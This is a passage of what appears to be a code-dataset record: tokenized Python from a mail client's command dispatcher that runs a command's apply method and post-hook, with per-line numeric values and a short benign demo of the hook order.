"dbman",
",",
"cmd",
"=",
"cmd",
")",
"try",
":",
"if",
"asyncio",
".",
"iscoroutinefunction",
"(",
"cmd",
".",
"apply",
")",
":",
"await",
"cmd",
".",
"apply",
"(",
"self",
")",
"else",
":",
"cmd",
".",
"apply",
"(",
"self",
")",
"except",
"Exception",
"as",
"e",
":",
"self",
".",
"_error_handler",
"(",
"e",
")",
"else",
":",
"if",
"cmd",
".",
"posthook",
":",
"logging",
".",
"info",
"(",
"'calling post-hook'",
")",
"await",
"cmd",
".",
"posthook",
"(",
"ui",
"=",
"self",
",",
"dbm",
"=",
"self",
".",
"dbman",
",",
"cmd",
"=",
"cmd",
")"
] | 35.192308 | [
0.02857142857142857,
0.18181818181818182,
0.08,
0,
0.030303030303030304,
0.16216216216216217,
0,
0.07317073170731707,
0.14,
0.18181818181818182,
0.025974025974025976,
0.05555555555555555,
0.13333333333333333,
0.07407407407407407,
0.029850746268656716,
0.125,
0.034482758620689655,
0.04878048780487805,
0.09523809523809523,
0.05714285714285714,
0.058823529411764705,
0.05263157894736842,
0.11764705882352941,
0.0625,
0.03773584905660377,
0.027777777777777776
] |
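The hook flow apply_command() implements, sketched without alot's Command class (FakeCmd is invented for the demo): prehook first, then apply — awaited when it is a coroutine function — then posthook:

import asyncio

class FakeCmd:
    # Stand-in for an alot Command with all three hooks defined.
    async def prehook(self, **kw): print("pre")
    async def apply(self, ui): print("apply")
    async def posthook(self, **kw): print("post")

async def demo(cmd):
    await cmd.prehook(ui=None, dbm=None, cmd=cmd)
    if asyncio.iscoroutinefunction(cmd.apply):
        await cmd.apply(None)   # coroutine apply is awaited
    else:
        cmd.apply(None)         # plain apply is called directly
    await cmd.posthook(ui=None, dbm=None, cmd=cmd)

asyncio.run(demo(FakeCmd()))  # -> pre / apply / post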